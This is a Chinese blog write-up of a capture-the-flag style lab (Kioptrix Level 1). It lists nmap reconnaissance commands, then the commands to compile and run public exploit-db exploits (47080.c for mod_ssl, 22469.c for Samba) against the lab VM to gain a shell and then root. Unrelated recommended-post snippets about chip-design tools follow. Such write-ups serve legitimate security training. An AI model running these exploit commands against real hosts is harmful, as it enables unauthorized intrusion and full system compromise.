Kioptrix Level 1

于 2024-12-14 19:39:05 发布
阅读量241 收藏 3
点赞数 5
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74034646/article/details/144474969
版权

Kioptrix Level 1

1.扫描IP和端口

nmap扫描虚拟机网段获取靶机ip

nmap -sS 192.168.110.0/24
在这里插入图片描述

2.nmap扫描获取开放端口

nmap -p- 192.168.110.148

​​在这里插入图片描述

3.探测端口版本等信息

nmap -sT -sC -sV -O -p22,80,111,139,443,1024 192.168.110.148

在这里插入图片描述

4.关键信息

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)

80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd (workgroup: lMYGROUP)

443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open status 1 (RPC #100024)

5.可用信息

Apache httpd 1.3.20 (Unix)

mod_ssl/2.8.4

OpenSSL/0.9.6b

6.查找漏洞

nmap --script=vuln -p22,80,111,139,443,1024 192.168.110.148

在这里插入图片描述

没截全

大概就是很多漏洞

利用方法

1)mod_ssl漏洞

在这里插入图片描述

直接用kali自带的exp利用

先复制到桌面

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

然后编译

gcc -o 47080 ./47080.c -lcrypto

在这里插入图片描述

然后运行一下该脚本查看Apache 1.3.20历史漏洞利用

./47080 | grep "1.3.20"

在这里插入图片描述

尝试发现0x6b可以利用

./47080 0x6b 192.168.110.148 -c 40

在这里插入图片描述

只拿到网站权限,还需要提权

提权

这里有提示,需要下载一个提权脚本

在这里插入图片描述

搭梯子去网上下载下来到本地,然后本地开启服务器给靶机下载
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

上传成功了
在这里插入图片描述

此时再执行脚本连接
在这里插入图片描述

在这里插入图片描述
提权成功

2)samba漏洞

nmap扫描不出来smb版本,用msf扫描

search smb_version

use auxiliary/scanner/smb/smb_version

在这里插入图片描述

版本是2.2.1a

查找漏洞

searchsploit samba

在这里插入图片描述

上面方框里面的和打箭头的都符合

尝试了一下,发现22469.c和10.c的可以使用

这里用22469.c演示

cp /usr/share/exploitdb/exploits/unix/remote/22469.c /root/Desktop

先复制到桌面

编译一下

gcc -o 22469 ./22469.c -lcrypto

然后运行

./22469 -t 192.168.110.148

在这里插入图片描述
拿到root权限

chzh1
关注
virtuoso的菜单栏中集成starrc、calibre
qq_34431979的博客
10-03 2141
那么可以尝试用这样的方式解决:将.cdsinit文件中集成starrc的语句,移动到集成calibre的语句之前。
starrc寄生参数提取与后仿.docx
01-09
starrc寄生参数提取与后仿.docx
StarRC寄生参数提取与后仿指南:集成电路设计的得力助手
gitblog_06619的博客
09-26 1219
StarRC寄生参数提取与后仿指南:集成电路设计的得力助手 【下载地址】StarRC寄生参数提取与后仿指南 StarRC寄生参数提取与后仿指南本仓库提供了一个名为“starrc寄生参数提取与后仿.docx”的资源文件,该文件详细介绍了如何进行StarRC寄生参数提取与后仿的流程和步骤 ...
StarRCStarRC抽取寄生RC
zxhtiger84的博客
12-14 5305
提供先进的推理,复杂的指令,更多的创造力。
寄生参数提取——StarRC
tong66666666的博客
07-31 8056
正常跑flow是不会出现任何open net的,因为只要有逻辑连接存在,工具就一定会按照逻辑连接关系进行实际的物理连线。如果发现绕不通就会把若干条net short在一起,而不会放置open不管的。只有signal net之间存在short和open,才会生成这两个文件,如果没有生成说明设计中没有signal net之间的short和open。这里会列出design中的所有short net以及它们的位置信息。因为工具发现open net会自己找一条net去接起来,而这个操作可能并不是实际的连接情况。
StarRC的妙用
i_chip_backend的博客
04-19 7818
StarRC的寄生参数抽取可以作为签收标准,和APR相比通常有如下的优(完)势(备)性以上种种,常见的影响主要是来自于metal filll。metal fill是一种常见的处理芯片流片的密度(density)问题。与常规的APR操作不同,metal fill通常实在calibre(GDS 工具里边)完成的,虽然历史上也流行过在APR工具里边完成的流程。但是从处理效率和独立想上而言,metal fill 确实是calibre等GDS工具的强项。
EDA虚拟系统安装使用.docx
08-08
本文档介绍了 EDA 虚拟系统的安装和使用方法,该系统基于 VMware12 Pro 虚拟机,操作系统为 Red Hat Enterprise Linux 6.7,集成了多种EDA 软件,包括 Synopsys、Cadence、Mentor 等主流厂商的软件。 一、EDA 虚拟...
starRC lef def
最新发布
01-04
### starRC、LEF 和 DEF 文件的 EDA 工具使用教程 #### 关于 starRC 的使用说明 starRC 是由 Synopsys 开发的一款用于寄生参数提取 (PEX) 的工具,在 detail routing 完成之后被调用,以提供精确的电阻电容延迟分析...
【SMIC18-IO综合库版图布局】:物理设计集成与时序闭合策略
![【SMIC18-IO综合库版图布局】:物理设计集成与时序闭合策略]...在当今半导体行业,SMIC18-IO综合库作为一款应用于18纳米工艺节点的集成电路设计综合库,其起源可追溯至对高性能
【GT911电路设计高手】:优化集成电路最佳实践
![【GT911电路设计高手】:优化集成电路最佳实践]...随后,文章着重论述了集成电路性能优化的策略,涵盖信号与电源完整性的提升、功耗控制及高频电路设计考
STARRC使用的脚本
03-11
STARRC脚本,配合readme使用,快速掌握该工具的使用
virtuoso的基本操作步骤.docx
12-06
从打开虚拟机到配置工艺库和设计库到最后创建原理图的详细图文解说
模拟技术中的Star-RCXT简介
10-22
1  Star-RCXT工具介绍   Star- RCXT以其高精度、友好的用户界面以及和其它工具良好的结合成为目前业界比较流行的一款寄生参数提取工具,是专门针对0.18mm及以下工艺的寄生参数提取所设计的。它采用了二点五维的几何提取技术,达到了三维的提取精度,但比三维的抽取工具速度快很多,能够快速准确地对上百万门的设计进行全局的寄生参数提取。 2  用Star-RCXT进行寄生参数提取的条件   应用Star-RCXT进行精细寄生参数提取,还需要两个与工艺参数有关的文件:mapping文件和ITF(Interconnect Technology Format)文件。ITF文件是由晶圆代工厂直
集成电路设计实战攻略】:理论与实践无缝对接,打造专业级电路设计
集成电路设计实战项目章节,本文讨论了项目规划、电路设计实践以及PCB布局布线的关键点。最后,本文展望了制造技术的未来发展以及软件和人工智能在设计领域中的潜在应用。整体而言,本文旨在为集成电路设计提供...
starrtc的使用
loren_123的博客
07-29 4195
1、WebSocket connection to 'wss://ip:端口/' failed: Error in connection establishment: net::ERR_CONNECTION_TIMED_OUT 1. ps -aux | grep Server 查看服务是否开启 2. 如果显示如图所示,直接跳到下一步 ...
Starrc input data
m0_61544122的博客
08-26 5129
starrc所需的输入文件如下图: nxtgrd:提取寄生参数所需的规则文件,对应命令TCAD_GRD_FILE:filepath。可以使用grdgenxo工具将ITF(Interconnt Technology Format)文件转成nxtgrd文件,对应命令如下: grdgenxo xx.itf map_file:将layout database(ndm/def、lef等)层次与nxtgrd的层次形成映射关系,对应命令MAPPING_FILE:filepath。 map file文件中常用的
StarRC常见问题整理
m0_61544122的博客
12-02 1523
我正在「拾陆楼」和朋友们讨论有趣的话题,你⼀起来吧?使用starrc_cmd “错误代码”就能看对应Error或Warnning的解释。
StarRC寄生参数提取与后仿指南
gitblog_06681的博客
09-26 1063
StarRC寄生参数提取与后仿指南 【下载地址】StarRC寄生参数提取与后仿指南 StarRC寄生参数提取与后仿指南本仓库提供了一个名为“starrc寄生参数提取与后仿.docx”的资源文件,该文件详细介绍了如何进行StarRC寄生参数提取与后仿的流程和步骤 ...
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值